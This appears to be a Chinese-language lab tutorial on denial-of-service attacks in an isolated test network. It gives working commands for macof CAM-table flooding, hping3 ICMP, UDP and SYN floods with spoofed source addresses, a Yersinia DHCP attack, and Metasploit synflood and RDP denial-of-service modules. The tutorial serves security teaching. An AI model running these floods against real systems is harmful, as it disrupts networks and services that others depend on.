一.数据链路层的拒绝服务攻击
实验所涉及的主机:
- Kali Linux 2主机IP: 192.168.17.130
- eNSP中PC1的IP: 192.168.17.101
- eNSP中PC2的IP: 192.168.17.102
案例:攻击交换机
- 原理:伪造大量的数据包(源MAC地址和目的MAC地址都是随机构造的)发送到交换机,很快将交换机CAM表填满,交换机退化为集线器。完成该任务的攻击工具为macof,它是dsniff工具集的成员,先安装再使用。
1、使用eNSP搭建实验环境
在eNSP中新建拓扑:
- PC1、PC2的IP地址必须与Kali Linux 2处于相同的网段.
- 通过iCloud作为Kali Linux 2 与eNSP中交换机之间的通道。
(1)iCloud的配置如下:
(2)搭建用于实验的拓扑图:
(3)同网段的两台主机可以互相ping通
2、在Kali Linux 2更新系统并安装dsniff工具集
(1)先更新系统
apt update
(2)安装dsniff
apt-get install dsniff
3、在Kali Linux 2启动macof
伪造大量的数据包发送到交换机,很快将交换机CAM表填满,交换机退化为集线器。
(1)启动macof
macof
(2)查看交换机
命令:
display mac-address
二:网络层的拒绝服务攻击
实验所涉及的主机:
- Kali Linux 2主机IP: 192.168.17.130
- 32位windows 7的IP: 192.168.17.128
案例:攻击32位windows 7:
- 做法:向目标主机不断发送“死亡之ping”(如65500字节的数据包),目标主机处理请求和应答,消耗目标主机的资源。由于现在的操作系统和CPU完全有能力处理65500这个数量级的数据包,效果不明显。
向目标主机发送大小为65500字节的数据包:
ping 192.168.17.128 -l 65500
必须进一步增加数据包的数量,有两种方法:
- 一是使用多台主机发送ICMP数据包;二是提高发送ICMP数据包的速度。我们采用第二种方法----hping3是一款用于生成和解析TCP/IP数据包的开源工具,可以实现拒绝服务攻击。
1、启动hping3
命令:
hping3
2、查看hping3帮助信息
命令:
hping3 -h
3、显示当前hping3版本
命令:
hping3 -v
4、构造基于ICMP的拒绝服务攻击
注:-q 表示静默模式;–rand-source 表示伪造随机的源地址;–id 0 表示有ICMP应答请求;-d 56 表示数据包的大小;–flood 表示尽可能快地发送数据包。
命令:
hping3 -q --rand-source --id 0 --icmp -d 56 --flood 192.168.17.128
5、查看结果
短短几十秒就产生了几十万个数据包
三.传输层的拒绝服务攻击
1.前期准备
(1)实验所涉及的主机:
- Kali Linux 2主机IP:192.168.17.103
- windows 2003 server主机IP:192.168.1.254
- 32位windows 7的IP: 192.168.17.101
- windows XP的IP: 192.168.17.102
(2)准备好DHCP服务器
提示:本节和下一节都要使用到DHCP服务器,先准备好DHCP服务器(IP为 192.168.1.254)
- 传输层有UDP和TCP两个协议,传输层攻击目标是主机的某个端口。
- 案例:攻击DHCP服务器,IP为192.168.140.254;192.168.140.131是欺骗源地址。
2.基于UDP协议的利用68端口(DHCP client服务端口)拒绝服务攻击
命令:
hping3 -q -n -a 192.168.1.101 --udp -s 53 --keep -p 68 --flood 192.168.1.254
- 重新获取IP地址
3.基于TCP协议的SYN拒绝服务攻击
命令:
hping3 -q -n -a 192.168.1.101 --S -s 53 --keep -p 22 --flood 192.168.1.254
- 重新获取IP地址
四.基于应用层的拒绝服务攻击
1.使用Yersinia工具
- 案例:对应用层DHCP协议的攻击,DHCP服务器IP为192.168.1.254。
(1)安装yersinia工具
- 安装前先将网卡切换回NAT模式
命令:
apt-get install yersinia
(2)启动yersinia工具
命令:
yersinia -G
(3) 选择攻击协议为DHCP
(4) 启动客户机测试
(5) 关闭Yersinia工作界面后重新获取
2.使用Metasploit
2-1.案例一:
攻击Web服务。搭建Web服务器,端口为80,IP为192.168.1.254。
(1)启动Metasploit框架。
命令:
msfconsole
(2)搜索与DoS(拒绝服务)相关的模块,并配置相关参数。
(2.1) 命令
search dos
(2.2) 载入模块命令
use auxiliary/dos/tcp/synflood
(2.3) 查看相关参数命令
show options
(2.4) 设置目标主机IP命令
set RHOSTS 192.168.1.254
(3)发动攻击
命令:
run
- 访问默认浏览器
2-2.案例二:
- 利用远程桌面协议的漏洞攻击。在Windows7上启动远程桌面,IP为192.168.17.101
(1) 启动Metasploit框架
- 命令:
msfconsole
(2) 搜索与DoS(拒绝服务)相关的模块,并配置相关参数。
- 命令:
search dos
(3) 发动攻击
命令:
exploit
- 发起攻击后出现蓝屏